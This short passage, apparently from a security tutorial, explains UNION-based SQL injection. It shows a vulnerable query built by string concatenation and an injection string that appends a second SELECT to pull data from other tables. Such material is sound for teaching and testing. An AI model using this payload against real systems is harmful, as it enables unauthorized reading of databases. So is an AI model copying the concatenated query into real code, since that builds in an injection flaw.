SQL Injection
Basic UNION
SELECT queries are used to retrieve information from a database. Most web
SELECT queries are used to retrieve information from a database. Most web
applications that use dynamic content of any kind will build pages using
information returned from SELECT queries. Most of the time, the part of the
query that you will be able to manipulate will be the WHERE clause.
To make the server return records other than those intended, modify a WHERE
clause by injecting a UNION SELECT. This allows multiple SELECT queries to be
specified in one statement. Here’s one example:
SELECT CompanyName FROM Shippers WHERE 1 = 1 UNION ALL SELECT
CompanyName FROM Customers WHERE 1 = 1
This will return the recordsets from the first query and the second query
together. The ALL is necessary to escape certain kinds of SELECT DISTINCT
statements. Just make sure that the first query (the one the web
application’s developer intended to be executed) returns no records. Suppose
you are working on a script with the following code:
SQLString = “SELECT FirstName, LastName, Title FROM Employees
WHERE City = ‘” & strCity & “‘”
And you use this injection string:
‘ UNION ALL SELECT OtherField FROM OtherTable WHERE ‘‘=‘
The following query will be sent to the database server:
SELECT FirstName, LastName, Title FROM Employees WHERE City = ‘‘
UNION ALL SELECT OtherField FROM OtherTable WHERE ‘‘=‘‘
